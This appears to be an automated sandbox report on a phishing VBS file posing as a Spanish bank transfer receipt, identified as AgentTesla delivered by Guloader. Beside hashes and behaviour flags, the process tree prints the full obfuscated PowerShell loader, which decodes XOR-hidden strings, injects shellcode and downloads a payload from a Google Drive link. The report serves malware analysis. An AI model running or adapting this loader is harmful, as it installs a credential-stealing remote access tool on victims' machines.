Analysis

  • max time kernel
    91s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-02-2023 18:41

General

  • Target

    justificante de transferencia.vbs

  • Size

    124KB

  • MD5

    2c5add519c94bcfa2e7c1064ceb64736

  • SHA1

    af99c8f0fb30a9a4fac437aa427ef44e41b535f9

  • SHA256

    b916b37fcc5b1f5a77f6ff3c36904e9f20cdea77266acbe3566f3459d8c1f1d0

  • SHA512

    7fd3feb9ebf3ddd7c21f2223324ff3ead68e34a799d2f2f21309a489abf4f59220880279cf77fba88322cb1d9ec6ef218c4febb6071695a7d809e4ea4e682913

  • SSDEEP

    3072:FrDq3Cj8LqEN9cy7jPLWCuHoq0lgmfaZXAR:1Dw/m09cyXYH/0lLQO

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1-7fE16kK-_VjGlyxUiZ77Miud4_JlSTH

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 3 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\justificante de transferencia.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\System32\cmd.exe
      cmd /c echo off
      2⤵
        PID:4092
      • C:\Windows\System32\cmd.exe
        cmd /c echo rshell
        2⤵
          PID:260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$stillsud = """Function Obli11 { param([String]`$Broo); `$Grnsund = ''; Write-Host `$Grnsund; Write-Host `$Grnsund; Write-Host `$Grnsund; `$Unconduc = New-Object byte[] (`$Broo.Length / 2); For(`$rubigi=0; `$rubigi -lt `$Broo.Length; `$rubigi+=2){ `$Unconduc[`$rubigi/2] = [convert]::ToByte(`$Broo.Substring(`$rubigi, 2), 16); `$Endysist = (`$Unconduc[`$rubigi/2] -bxor 241); `$Unconduc[`$rubigi/2] = `$Endysist; } [String][System.Text.Encoding]::ASCII.GetString(`$Unconduc);}`$Bandlyses0=Obli11 'A2888285949CDF959D9D';`$Bandlyses1=Obli11 'BC9892839E829E9785DFA6989FC2C3DFA49F82909794BF9085988794BC9485999E9582';`$Bandlyses2=Obli11 'B69485A1839E92B0959583948282';`$Bandlyses3=Obli11 'A2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497';`$Bandlyses4=Obli11 '828583989F96';`$Bandlyses5=Obli11 'B69485BC9E95849D94B9909F959D94';`$Bandlyses6=Obli11 'A3A5A281949298909DBF909C94DDD1B9989594B388A29896DDD1A184939D9892';`$Bandlyses7=Obli11 'A3849F85989C94DDD1BC909F90969495';`$Bandlyses8=Obli11 'A394979D9492859495B5949D9496908594';`$Bandlyses9=Obli11 'B89FBC949C9E8388BC9E95849D94';`$Presuffer0=Obli11 'BC88B5949D9496908594A5888194';`$Presuffer1=Obli11 'B29D908282DDD1A184939D9892DDD1A294909D9495DDD1B09F8298B29D908282DDD1B084859EB29D908282';`$Presuffer2=Obli11 'B89F879E9A94';`$Presuffer3=Obli11 'A184939D9892DDD1B9989594B388A29896DDD1BF9486A29D9E85DDD1A798838584909D';`$Presuffer4=Obli11 'A798838584909DB09D9D9E92';`$Presuffer5=Obli11 '9F85959D9D';`$Presuffer6=Obli11 'BF85A1839E85949285A798838584909DBC949C9E8388';`$Presuffer7=Obli11 'B8B4A9';`$Presuffer8=Obli11 'AD';`$papa=Obli11 'A4A2B4A3C2C3';`$Prodigalis=Obli11 'B2909D9DA6989F959E86A1839E92B0';function fkp {Param (`$Destabili, `$Skrifts) ;`$Gastrosc0 =Obli11 'D5BC9092839E929D989C90D1CCD1D9AAB08181B59E9C90989FACCBCBB2848383949F85B59E9C90989FDFB69485B08282949C939D989482D9D8D18DD1A699948394DCBE939B949285D18AD1D5AEDFB69D9E93909DB08282949C939D88B290929994D1DCB09F95D1D5AEDFBD9E929085989E9FDFA2819D9885D9D5A18394828497979483C9D8AADCC0ACDFB48084909D82D9D5B3909F959D88829482C1D8D18CD8DFB69485A5888194D9D5B3909F959D88829482C0D8';.(`$Presuffer7) `$Gastrosc0;`$Gastrosc5 = Obli11 'D5A9949F9E828290D1CCD1D5BC9092839E929D989C90DFB69485BC9485999E95D9D5B3909F959D88829482C3DDD1AAA5888194AAACACD1B1D9D5B3909F959D88829482C2DDD1D5B3909F959D88829482C5D8D8';.(`$Presuffer7) `$Gastrosc5;`$Gastrosc1 = Obli11 '83948584839FD1D5A9949F9E828290DFB89F879E9A94D9D59F849D9DDDD1B1D9AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497ACD9BF9486DCBE939B949285D1A2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497D9D9BF9486DCBE939B949285D1B89F85A18583D8DDD1D9D5BC9092839E929D989C90DFB69485BC9485999E95D9D5B3909F959D88829482C4D8D8DFB89F879E9A94D9D59F849D9DDDD1B1D9D5B59482859093989D98D8D8D8D8DDD1D5A29A8398978582D8D8';.(`$Presuffer7) `$Gastrosc1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Indish,[Parameter(Position = 1)] [Type] `$konk = [Void]);`$Gastrosc2 = Obli11 'D5B3848385889E879483D1CCD1AAB08181B59E9C90989FACCBCBB2848383949F85B59E9C90989FDFB59497989F94B5889F909C9892B08282949C939D88D9D9BF9486DCBE939B949285D1A2888285949CDFA394979D949285989E9FDFB08282949C939D88BF909C94D9D5B3909F959D88829482C9D8D8DDD1AAA2888285949CDFA394979D949285989E9FDFB49C9885DFB08282949C939D88B384989D959483B09292948282ACCBCBA3849FD8DFB59497989F94B5889F909C9892BC9E95849D94D9D5B3909F959D88829482C8DDD1D597909D8294D8DFB59497989F94A5888194D9D5A18394828497979483C1DDD1D5A18394828497979483C0DDD1AAA2888285949CDFBC849D859892908285B5949D9496908594ACD8';.(`$Presuffer7) `$Gastrosc2;`$Gastrosc3 = Obli11 'D5B3848385889E879483DFB59497989F94B29E9F8285838492859E83D9D5B3909F959D88829482C7DDD1AAA2888285949CDFA394979D949285989E9FDFB2909D9D989F96B29E9F87949F85989E9F82ACCBCBA285909F95908395DDD1D5B89F95988299D8DFA29485B89C819D949C949F859085989E9FB79D909682D9D5B3909F959D88829482C6D8';.(`$Presuffer7) `$Gastrosc3;`$Gastrosc4 = Obli11 'D5B3848385889E879483DFB59497989F94BC9485999E95D9D5A18394828497979483C3DDD1D5A18394828497979483C2DDD1D59A9E9F9ADDD1D5B89F95988299D8DFA29485B89C819D949C949F859085989E9FB79D909682D9D5B3909F959D88829482C6D8';.(`$Presuffer7) `$Gastrosc4;`$Gastrosc5 = Obli11 '83948584839FD1D5B3848385889E879483DFB28394908594A5888194D9D8';.(`$Presuffer7) `$Gastrosc5 ;}`$Paleoant = Obli11 '9A94839F949DC2C3';`$Obli03 = Obli11 'B69485B29E9F829E9D94A6989F959E86';`$Obli00=Obli11 'A2999E86A6989F959E86';`$Obli01 = Obli11 'D5B79E8385909694839984D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D581908190D1D5BE939D98C1C1D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAA4B89F85C2C3ACD8D1D9AAB89F85A18583ACD8D8D8';.(`$Presuffer7) `$Obli01;`$Obli02 = Obli11 'D5BC9E9587968590D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D5A1909D949E909F85D1D5BE939D98C1C2D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACD8D1D9AAB89F85A18583ACD8D8D8';.(`$Presuffer7) `$Obli02;`$Gastrosc7 = Obli11 'D5B583879D948382D1CCD1D5BC9E9587968590DFB89F879E9A94D9C1D8';.(`$Presuffer7) `$Gastrosc7;`$Gastrosc7 = Obli11 'D5B79E8385909694839984DFB89F879E9A94D9D5B583879D948382DDD1C1D8';.(`$Presuffer7) `$Gastrosc7;`$Gastrosc6 = Obli11 'D5BE9C938495829C909FD1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D5A1909D949E909F85D1D5A18394828497979483C5D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAA4B89F85C2C3ACDDD1AAA4B89F85C2C3ACDDD1AAA4B89F85C2C3ACD8D1D9AAB89F85A18583ACD8D8D8';.(`$Presuffer7) `$Gastrosc6;`$Depr = fkp `$Presuffer5 `$Presuffer6;`$Gastrosc7 = Obli11 'D59D9485859495C2D1CCD1D5BE9C938495829C909FDFB89F879E9A94D9AAB89F85A18583ACCBCBAB94839EDDD1C7C5C7DDD1C189C2C1C1C1DDD1C189C5C1D8';.(`$Presuffer7) `$Gastrosc7;`$Gastrosc8 = Obli11 'D5B583909F9A9483D1CCD1D5BE9C938495829C909FDFB89F879E9A94D9AAB89F85A18583ACCBCBAB94839EDDD1C7C0C5C5C9C0C8C3DDD1C189C2C1C1C1DDD1C189C5D8';.(`$Presuffer7) `$Gastrosc8;`$Obli01 = 'https://drive.google.com/uc?export=download&id=1-7fE16kK-_VjGlyxUiZ77Miud4_JlSTH';`$Obli00 = Obli11 'D5B084839E9288909FD1CCD1D9BF9486DCBE939B949285D1BF9485DFA69493B29D98949F85D8DFB59E869F9D9E9095A28583989F96D9D5BE939D98C1C0D8';`$Gastrosc8 = Obli11 'D59D9485859495C3CCD5949F87CB90818195908590';.(`$Presuffer7) `$Gastrosc8;`$letted2=`$letted2+'\Forblo.dat';`$Aurocyan='';if (-not(Test-Path `$letted2)) {while (`$Aurocyan -eq '') {.(`$Presuffer7) `$Obli00;Start-Sleep 5;}Set-Content `$letted2 `$Aurocyan;}`$Aurocyan = Get-Content `$letted2;`$Gastrosc9 = Obli11 'D5B6908285839E8292D1CCD1AAA2888285949CDFB29E9F87948385ACCBCBB7839E9CB3908294C7C5A28583989F96D9D5B084839E9288909FD8';.(`$Presuffer7) `$Gastrosc9;`$Aurocyan0 = Obli11 'AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB29E8188D9D5B6908285839E8292DDD1C1DDD1D1D59D9485859495C2DDD1C7C5C7D8';.(`$Presuffer7) `$Aurocyan0;`$Unerrantly132=`$Gastrosc.count-646;`$Aurocyan1 = Obli11 'AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB29E8188D9D5B6908285839E8292DDD1C7C5C7DDD1D5B583909F9A9483DDD1D5A49F948383909F859D88C0C2C3D8';.(`$Presuffer7) `$Aurocyan1;`$Aurocyan2 = Obli11 'D5A194928584C8C2D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D581908190D1D5A1839E959896909D9882D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACD8D1D9AAB89F85A18583ACD8D8D8';.(`$Presuffer7) `$Aurocyan2;`$Aurocyan3 = Obli11 'D5A194928584C8C2DFB89F879E9A94D9D59D9485859495C2DDD5B583909F9A9483DDD5B5948183DDC1DDC1D8';.(`$Presuffer7) `$Aurocyan3#;""";Function Aurocyan9 { param([String]$Broo); For($rubigi=0; $rubigi -lt $Broo.Length-1; $rubigi+=(0+1)){$Obli = $Obli + $Broo.Substring($rubigi, 1)}; $Obli;}$Masturbat1250 = Aurocyan9 'IEX ';$Masturbat1251= Aurocyan9 $stillsud;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Masturbat1251 ;}else{.$Masturbat1250 $Masturbat1251;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Obli11 { param([String]$Broo); $Grnsund = ''; Write-Host $Grnsund; Write-Host $Grnsund; Write-Host $Grnsund; $Unconduc = New-Object byte[] ($Broo.Length / 2); For($rubigi=0; $rubigi -lt $Broo.Length; $rubigi+=2){ $Unconduc[$rubigi/2] = [convert]::ToByte($Broo.Substring($rubigi, 2), 16); $Endysist = ($Unconduc[$rubigi/2] -bxor 241); $Unconduc[$rubigi/2] = $Endysist; } [String][System.Text.Encoding]::ASCII.GetString($Unconduc);}$Bandlyses0=Obli11 'A2888285949CDF959D9D';$Bandlyses1=Obli11 'BC9892839E829E9785DFA6989FC2C3DFA49F82909794BF9085988794BC9485999E9582';$Bandlyses2=Obli11 'B69485A1839E92B0959583948282';$Bandlyses3=Obli11 'A2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497';$Bandlyses4=Obli11 '828583989F96';$Bandlyses5=Obli11 'B69485BC9E95849D94B9909F959D94';$Bandlyses6=Obli11 'A3A5A281949298909DBF909C94DDD1B9989594B388A29896DDD1A184939D9892';$Bandlyses7=Obli11 'A3849F85989C94DDD1BC909F90969495';$Bandlyses8=Obli11 'A394979D9492859495B5949D9496908594';$Bandlyses9=Obli11 'B89FBC949C9E8388BC9E95849D94';$Presuffer0=Obli11 'BC88B5949D9496908594A5888194';$Presuffer1=Obli11 'B29D908282DDD1A184939D9892DDD1A294909D9495DDD1B09F8298B29D908282DDD1B084859EB29D908282';$Presuffer2=Obli11 'B89F879E9A94';$Presuffer3=Obli11 'A184939D9892DDD1B9989594B388A29896DDD1BF9486A29D9E85DDD1A798838584909D';$Presuffer4=Obli11 'A798838584909DB09D9D9E92';$Presuffer5=Obli11 '9F85959D9D';$Presuffer6=Obli11 'BF85A1839E85949285A798838584909DBC949C9E8388';$Presuffer7=Obli11 'B8B4A9';$Presuffer8=Obli11 'AD';$papa=Obli11 'A4A2B4A3C2C3';$Prodigalis=Obli11 'B2909D9DA6989F959E86A1839E92B0';function fkp {Param ($Destabili, $Skrifts) ;$Gastrosc0 =Obli11 'D5BC9092839E929D989C90D1CCD1D9AAB08181B59E9C90989FACCBCBB2848383949F85B59E9C90989FDFB69485B08282949C939D989482D9D8D18DD1A699948394DCBE939B949285D18AD1D5AEDFB69D9E93909DB08282949C939D88B290929994D1DCB09F95D1D5AEDFBD9E929085989E9FDFA2819D9885D9D5A18394828497979483C9D8AADCC0ACDFB48084909D82D9D5B3909F959D88829482C1D8D18CD8DFB69485A5888194D9D5B3909F959D88829482C0D8';.($Presuffer7) $Gastrosc0;$Gastrosc5 = Obli11 'D5A9949F9E828290D1CCD1D5BC9092839E929D989C90DFB69485BC9485999E95D9D5B3909F959D88829482C3DDD1AAA5888194AAACACD1B1D9D5B3909F959D88829482C2DDD1D5B3909F959D88829482C5D8D8';.($Presuffer7) $Gastrosc5;$Gastrosc1 = Obli11 '83948584839FD1D5A9949F9E828290DFB89F879E9A94D9D59F849D9DDDD1B1D9AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497ACD9BF9486DCBE939B949285D1A2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFB9909F959D94A39497D9D9BF9486DCBE939B949285D1B89F85A18583D8DDD1D9D5BC9092839E929D989C90DFB69485BC9485999E95D9D5B3909F959D88829482C4D8D8DFB89F879E9A94D9D59F849D9DDDD1B1D9D5B59482859093989D98D8D8D8D8DDD1D5A29A8398978582D8D8';.($Presuffer7) $Gastrosc1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Indish,[Parameter(Position = 1)] [Type] $konk = [Void]);$Gastrosc2 = Obli11 'D5B3848385889E879483D1CCD1AAB08181B59E9C90989FACCBCBB2848383949F85B59E9C90989FDFB59497989F94B5889F909C9892B08282949C939D88D9D9BF9486DCBE939B949285D1A2888285949CDFA394979D949285989E9FDFB08282949C939D88BF909C94D9D5B3909F959D88829482C9D8D8DDD1AAA2888285949CDFA394979D949285989E9FDFB49C9885DFB08282949C939D88B384989D959483B09292948282ACCBCBA3849FD8DFB59497989F94B5889F909C9892BC9E95849D94D9D5B3909F959D88829482C8DDD1D597909D8294D8DFB59497989F94A5888194D9D5A18394828497979483C1DDD1D5A18394828497979483C0DDD1AAA2888285949CDFBC849D859892908285B5949D9496908594ACD8';.($Presuffer7) $Gastrosc2;$Gastrosc3 = Obli11 'D5B3848385889E879483DFB59497989F94B29E9F8285838492859E83D9D5B3909F959D88829482C7DDD1AAA2888285949CDFA394979D949285989E9FDFB2909D9D989F96B29E9F87949F85989E9F82ACCBCBA285909F95908395DDD1D5B89F95988299D8DFA29485B89C819D949C949F859085989E9FB79D909682D9D5B3909F959D88829482C6D8';.($Presuffer7) $Gastrosc3;$Gastrosc4 = Obli11 'D5B3848385889E879483DFB59497989F94BC9485999E95D9D5A18394828497979483C3DDD1D5A18394828497979483C2DDD1D59A9E9F9ADDD1D5B89F95988299D8DFA29485B89C819D949C949F859085989E9FB79D909682D9D5B3909F959D88829482C6D8';.($Presuffer7) $Gastrosc4;$Gastrosc5 = Obli11 '83948584839FD1D5B3848385889E879483DFB28394908594A5888194D9D8';.($Presuffer7) $Gastrosc5 ;}$Paleoant = Obli11 '9A94839F949DC2C3';$Obli03 = Obli11 'B69485B29E9F829E9D94A6989F959E86';$Obli00=Obli11 'A2999E86A6989F959E86';$Obli01 = Obli11 'D5B79E8385909694839984D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D581908190D1D5BE939D98C1C1D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAA4B89F85C2C3ACD8D1D9AAB89F85A18583ACD8D8D8';.($Presuffer7) $Obli01;$Obli02 = Obli11 'D5BC9E9587968590D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D5A1909D949E909F85D1D5BE939D98C1C2D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACD8D1D9AAB89F85A18583ACD8D8D8';.($Presuffer7) $Obli02;$Gastrosc7 = Obli11 'D5B583879D948382D1CCD1D5BC9E9587968590DFB89F879E9A94D9C1D8';.($Presuffer7) $Gastrosc7;$Gastrosc7 = Obli11 'D5B79E8385909694839984DFB89F879E9A94D9D5B583879D948382DDD1C1D8';.($Presuffer7) $Gastrosc7;$Gastrosc6 = Obli11 'D5BE9C938495829C909FD1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D5A1909D949E909F85D1D5A18394828497979483C5D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAA4B89F85C2C3ACDDD1AAA4B89F85C2C3ACDDD1AAA4B89F85C2C3ACD8D1D9AAB89F85A18583ACD8D8D8';.($Presuffer7) $Gastrosc6;$Depr = fkp $Presuffer5 $Presuffer6;$Gastrosc7 = Obli11 'D59D9485859495C2D1CCD1D5BE9C938495829C909FDFB89F879E9A94D9AAB89F85A18583ACCBCBAB94839EDDD1C7C5C7DDD1C189C2C1C1C1DDD1C189C5C1D8';.($Presuffer7) $Gastrosc7;$Gastrosc8 = Obli11 'D5B583909F9A9483D1CCD1D5BE9C938495829C909FDFB89F879E9A94D9AAB89F85A18583ACCBCBAB94839EDDD1C7C0C5C5C9C0C8C3DDD1C189C2C1C1C1DDD1C189C5D8';.($Presuffer7) $Gastrosc8;$Obli01 = 'https://drive.google.com/uc?export=download&id=1-7fE16kK-_VjGlyxUiZ77Miud4_JlSTH';$Obli00 = Obli11 'D5B084839E9288909FD1CCD1D9BF9486DCBE939B949285D1BF9485DFA69493B29D98949F85D8DFB59E869F9D9E9095A28583989F96D9D5BE939D98C1C0D8';$Gastrosc8 = Obli11 'D59D9485859495C3CCD5949F87CB90818195908590';.($Presuffer7) $Gastrosc8;$letted2=$letted2+'\Forblo.dat';$Aurocyan='';if (-not(Test-Path $letted2)) {while ($Aurocyan -eq '') {.($Presuffer7) $Obli00;Start-Sleep 5;}Set-Content $letted2 $Aurocyan;}$Aurocyan = Get-Content $letted2;$Gastrosc9 = Obli11 'D5B6908285839E8292D1CCD1AAA2888285949CDFB29E9F87948385ACCBCBB7839E9CB3908294C7C5A28583989F96D9D5B084839E9288909FD8';.($Presuffer7) $Gastrosc9;$Aurocyan0 = Obli11 'AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB29E8188D9D5B6908285839E8292DDD1C1DDD1D1D59D9485859495C2DDD1C7C5C7D8';.($Presuffer7) $Aurocyan0;$Unerrantly132=$Gastrosc.count-646;$Aurocyan1 = Obli11 'AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB29E8188D9D5B6908285839E8292DDD1C7C5C7DDD1D5B583909F9A9483DDD1D5A49F948383909F859D88C0C2C3D8';.($Presuffer7) $Aurocyan1;$Aurocyan2 = Obli11 'D5A194928584C8C2D1CCD1AAA2888285949CDFA3849F85989C94DFB89F8594839E81A294838798929482DFBC90838299909DACCBCBB69485B5949D9496908594B79E83B7849F9285989E9FA19E989F859483D9D9979A81D1D581908190D1D5A1839E959896909D9882D8DDD1D9B6B5A5D1B1D9AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACDDD1AAB89F85A18583ACD8D1D9AAB89F85A18583ACD8D8D8';.($Presuffer7) $Aurocyan2;$Aurocyan3 = Obli11 'D5A194928584C8C2DFB89F879E9A94D9D59D9485859495C2DDD5B583909F9A9483DDD5B5948183DDC1DDC1D8';.($Presuffer7) $Aurocyan3#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3740
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
              • Checks QEMU agent file
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4872

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/260-133-0x0000000000000000-mapping.dmp
      • memory/1704-149-0x00007FF8F8C90000-0x00007FF8F9751000-memory.dmp
        Filesize

        10.8MB

      • memory/1704-134-0x0000000000000000-mapping.dmp
      • memory/1704-135-0x0000013779B00000-0x0000013779B22000-memory.dmp
        Filesize

        136KB

      • memory/1704-165-0x00007FF8F8C90000-0x00007FF8F9751000-memory.dmp
        Filesize

        10.8MB

      • memory/1704-137-0x00007FF8F8C90000-0x00007FF8F9751000-memory.dmp
        Filesize

        10.8MB

      • memory/3740-150-0x0000000008780000-0x000000000C21A000-memory.dmp
        Filesize

        58.6MB

      • memory/3740-164-0x0000000008780000-0x000000000C21A000-memory.dmp
        Filesize

        58.6MB

      • memory/3740-140-0x00000000058F0000-0x0000000005912000-memory.dmp
        Filesize

        136KB

      • memory/3740-141-0x0000000006010000-0x0000000006076000-memory.dmp
        Filesize

        408KB

      • memory/3740-142-0x0000000006170000-0x00000000061D6000-memory.dmp
        Filesize

        408KB

      • memory/3740-143-0x00000000067A0000-0x00000000067BE000-memory.dmp
        Filesize

        120KB

      • memory/3740-145-0x0000000006CF0000-0x0000000006D0A000-memory.dmp
        Filesize

        104KB

      • memory/3740-144-0x0000000008100000-0x000000000877A000-memory.dmp
        Filesize

        6.5MB

      • memory/3740-146-0x0000000007A80000-0x0000000007B16000-memory.dmp
        Filesize

        600KB

      • memory/3740-147-0x00000000079D0000-0x00000000079F2000-memory.dmp
        Filesize

        136KB

      • memory/3740-148-0x000000000C220000-0x000000000C7C4000-memory.dmp
        Filesize

        5.6MB

      • memory/3740-138-0x0000000002EB0000-0x0000000002EE6000-memory.dmp
        Filesize

        216KB

      • memory/3740-136-0x0000000000000000-mapping.dmp
      • memory/3740-151-0x00007FF917850000-0x00007FF917A45000-memory.dmp
        Filesize

        2.0MB

      • memory/3740-152-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB

      • memory/3740-139-0x0000000005970000-0x0000000005F98000-memory.dmp
        Filesize

        6.2MB

      • memory/3740-154-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB

      • memory/3740-156-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB

      • memory/4092-132-0x0000000000000000-mapping.dmp
      • memory/4872-163-0x0000000000400000-0x0000000000430000-memory.dmp
        Filesize

        192KB

      • memory/4872-157-0x00007FF917850000-0x00007FF917A45000-memory.dmp
        Filesize

        2.0MB

      • memory/4872-159-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB

      • memory/4872-160-0x0000000000400000-0x000000000062B000-memory.dmp
        Filesize

        2.2MB

      • memory/4872-161-0x0000000000401000-0x000000000062B000-memory.dmp
        Filesize

        2.2MB

      • memory/4872-155-0x0000000000B00000-0x000000000459A000-memory.dmp
        Filesize

        58.6MB

      • memory/4872-153-0x0000000000000000-mapping.dmp
      • memory/4872-158-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB

      • memory/4872-166-0x0000000023E20000-0x0000000023EB2000-memory.dmp
        Filesize

        584KB

      • memory/4872-167-0x0000000023DB0000-0x0000000023DBA000-memory.dmp
        Filesize

        40KB

      • memory/4872-168-0x0000000023F10000-0x0000000023F60000-memory.dmp
        Filesize

        320KB

      • memory/4872-169-0x0000000024270000-0x0000000024432000-memory.dmp
        Filesize

        1.8MB

      • memory/4872-170-0x00007FF917850000-0x00007FF917A45000-memory.dmp
        Filesize

        2.0MB

      • memory/4872-171-0x00000000777C0000-0x0000000077963000-memory.dmp
        Filesize

        1.6MB